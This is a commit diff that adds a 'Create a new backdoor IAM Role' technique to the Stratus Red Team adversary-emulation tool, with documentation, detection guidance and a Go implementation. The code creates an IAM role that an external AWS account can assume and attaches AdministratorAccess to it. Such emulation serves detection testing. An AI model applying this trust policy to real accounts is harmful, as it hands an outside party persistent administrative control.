add aws iam-create-backdoor-role attack technique

docs/attack-techniques/AWS/aws.persistence.iam-create-backdoor-role.md

@@ -0,0 +1,83 @@
+---
+title: Create a new backdoor IAM Role
+---
+
+# Create a new backdoor IAM Role
+
+
+
+
+Platform: AWS
+
+## MITRE ATT&CK Tactics
+
+
+- Persistence
+
+## Description
+
+
+Establishes persistence by creating a backdoored new role with a policy allowing it to be assumed from an external AWS account and administrative permissions.
+
+<span style="font-variant: small-caps;">Warm-up</span>: None.
+
+<span style="font-variant: small-caps;">Detonation</span>: 
+
+- Create a new IAM role with an assume role policy backdoored, making it accessible from an external, fictitious AWS account:
+
+```
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "Service": "ec2.amazonaws.com"
+      },
+      "Action": "sts:AssumeRole"
+    },
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "arn:aws:iam::193672423079:root"
+      },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+```
+
+and attach the 'AdministratorAccess' managed IAM policy to it. 
+
+References:
+
+- https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate aws.persistence.iam-create-backdoor-role
+```
+## Detection
+
+
+- Through [IAM Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-iam-role), 
+which generates a finding when a role can be assumed from a new AWS account or publicly.
+
+- Identify a call to <code>CreateRole</code> closely followed by <code>AttachRolePolicy</code> with an administrator policy.
+
+- Identify a call to <code>CreateRole</code> that contains an assumeRolePolicyDocument in the requestParameters that allows access from an external AWS account. Sample event:
+
+```
+{
+  "eventSource": "iam.amazonaws.com",
+  "eventName": "CreateRole",
+  "requestParameters": {
+	"roleName": "malicious-iam-role",
+	"assumeRolePolicyDocument": "{\n  \"Version\": \"2012-10-17\",\n  \"Statement\": [\n    {\n      \"Effect\": \"Allow\",\n      \"Principal\": {\n        \"Service\": \"ec2.amazonaws.com\"\n      },\n      \"Action\": \"sts:AssumeRole\"\n    },\n    {\n      \"Effect\": \"Allow\",\n      \"Principal\": {\n        \"AWS\": \"arn:aws:iam::193672423079:root\"\n      },\n      \"Action\": \"sts:AssumeRole\"\n    }\n  ]\n}"
+   }
+}
+```
+
+

docs/attack-techniques/AWS/index.md

@@ -88,6 +88,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Create an administrative IAM User](./aws.persistence.iam-create-admin-user.md)
 
+- [Create a new backdoor IAM Role](./aws.persistence.iam-create-backdoor-role.md)
+
 - [Create a Login Profile on an IAM User](./aws.persistence.iam-create-user-login-profile.md)
 
 - [Backdoor Lambda Function Through Resource-Based Policy](./aws.persistence.lambda-backdoor-function.md)

docs/attack-techniques/list.md

@@ -38,6 +38,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Backdoor an IAM Role](./AWS/aws.persistence.iam-backdoor-role.md) | [AWS](./AWS/index.md) | Persistence |
 | [Create an Access Key on an IAM User](./AWS/aws.persistence.iam-backdoor-user.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Create an administrative IAM User](./AWS/aws.persistence.iam-create-admin-user.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
+| [Create a new backdoor IAM Role](./AWS/aws.persistence.iam-create-backdoor-role.md) | [AWS](./AWS/index.md) | Persistence |
 | [Create a Login Profile on an IAM User](./AWS/aws.persistence.iam-create-user-login-profile.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Backdoor Lambda Function Through Resource-Based Policy](./AWS/aws.persistence.lambda-backdoor-function.md) | [AWS](./AWS/index.md) | Persistence |
 | [Add a Malicious Lambda Extension](./AWS/aws.persistence.lambda-layer-extension.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |

docs/index.yaml

@@ -214,6 +214,13 @@ AWS:
             - Privilege Escalation
           platform: AWS
           isIdempotent: false
+        - id: aws.persistence.iam-create-backdoor-role
+          name: Create a new backdoor IAM Role
+          isSlow: false
+          mitreAttackTactics:
+            - Persistence
+          platform: AWS
+          isIdempotent: false
         - id: aws.persistence.iam-create-user-login-profile
           name: Create a Login Profile on an IAM User
           isSlow: false

v2/internal/attacktechniques/aws/persistence/iam-create-backdoor-role/main.go

@@ -0,0 +1,123 @@
+package aws
+
+import (
+	"context"
+	_ "embed"
+	"errors"
+	"github.com/aws/aws-sdk-go-v2/service/iam"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+	"log"
+)
+
+//go:embed malicious_policy.json
+var maliciousIamPolicy string
+
+var roleName string = "malicious-iam-role"
+var adminPolicyArn string = "arn:aws:iam::aws:policy/AdministratorAccess"
+
+func init() {
+	const codeBlock = "```"
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:           "aws.persistence.iam-create-backdoor-role",
+		FriendlyName: "Create a new backdoor IAM Role",
+		Description: `
+Establishes persistence by creating a backdoored new role with a policy allowing it to be assumed from an external AWS account and administrative permissions.
+
+Warm-up: None.
+
+Detonation: 
+
+- Create a new IAM role with an assume role policy backdoored, making it accessible from an external, fictitious AWS account:
+
+` + codeBlock + `
+` + maliciousIamPolicy + `
+` + codeBlock + `
+
+and attach the 'AdministratorAccess' managed IAM policy to it. 
+
+References:
+
+- https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+`,
+		Detection: `
+- Through [IAM Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-iam-role), 
+which generates a finding when a role can be assumed from a new AWS account or publicly.
+
+- Identify a call to <code>CreateRole</code> closely followed by <code>AttachRolePolicy</code> with an administrator policy.
+
+- Identify a call to <code>CreateRole</code> that contains an assumeRolePolicyDocument in the requestParameters that allows access from an external AWS account. Sample event:
+
+` + codeBlock + `
+{
+  "eventSource": "iam.amazonaws.com",
+  "eventName": "CreateRole",
+  "requestParameters": {
+	"roleName": "malicious-iam-role",
+	"assumeRolePolicyDocument": "{\n  \"Version\": \"2012-10-17\",\n  \"Statement\": [\n    {\n      \"Effect\": \"Allow\",\n      \"Principal\": {\n        \"Service\": \"ec2.amazonaws.com\"\n      },\n      \"Action\": \"sts:AssumeRole\"\n    },\n    {\n      \"Effect\": \"Allow\",\n      \"Principal\": {\n        \"AWS\": \"arn:aws:iam::193672423079:root\"\n      },\n      \"Action\": \"sts:AssumeRole\"\n    }\n  ]\n}"
+   }
+}
+` + codeBlock + `
+`,
+		Platform:                   stratus.AWS,
+		IsIdempotent:               false, // cannot create twice a role with the same name
+		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Persistence},
+		Detonate:                   detonate,
+		Revert:                     revert,
+	})
+}
+
+func detonate(_ map[string]string, providers stratus.CloudProviders) error {
+	iamClient := iam.NewFromConfig(providers.AWS().GetConnection())
+
+	log.Println("Creating a malicious IAM role")
+	input := &iam.CreateRoleInput{
+		RoleName:                 &roleName,
+		AssumeRolePolicyDocument: &maliciousIamPolicy,
+	}
+
+	_, err := iamClient.CreateRole(context.TODO(), input)
+	if err != nil {
+		return errors.New("Unable to create IAM role: " + err.Error())
+	}
+
+	log.Println("IAM role created: " + roleName)
+
+
+	attachPolicyInput := &iam.AttachRolePolicyInput{
+		RoleName:  &roleName,
+		PolicyArn: &adminPolicyArn,
+	}
+
+	_, err = iamClient.AttachRolePolicy(context.TODO(), attachPolicyInput)
+	if err != nil {
+		log.Fatalf("Unable to attach AdministratorAccess policy to IAM role: %v", err)
+	}
+
+	log.Println("AdministratorAccess policy attached successfully")
+	return nil
+}
+
+func revert(_ map[string]string, providers stratus.CloudProviders) error {
+	iamClient := iam.NewFromConfig(providers.AWS().GetConnection())
+	detachPolicyInput := &iam.DetachRolePolicyInput{
+		RoleName:  &roleName,
+		PolicyArn: &adminPolicyArn,
+	}
+	_, err := iamClient.DetachRolePolicy(context.TODO(), detachPolicyInput)
+	if err != nil {
+		return errors.New("Unable to detach policy from IAM role: " + err.Error())
+	}
+	log.Println("Policy detached from IAM role: " + roleName)
+	log.Println("Deleting IAM role " + roleName)
+	input := &iam.DeleteRoleInput{
+		RoleName: &roleName,
+	}
+	_, err = iamClient.DeleteRole(context.TODO(), input)
+	if err != nil {
+		return errors.New("Unable to delete IAM role: " + err.Error())
+	}
+
+	log.Println("IAM role deleted: " + roleName)
+	return nil
+}

v2/internal/attacktechniques/aws/persistence/iam-create-backdoor-role/malicious_policy.json

@@ -0,0 +1,19 @@
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "Service": "ec2.amazonaws.com"
+      },
+      "Action": "sts:AssumeRole"
+    },
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "arn:aws:iam::193672423079:root"
+      },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}

v2/internal/attacktechniques/main.go

@@ -30,6 +30,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/iam-backdoor-role"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/iam-backdoor-user"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/iam-create-admin-user"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/iam-create-backdoor-role"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/iam-create-user-login-profile"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-backdoor-function"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-layer-extension"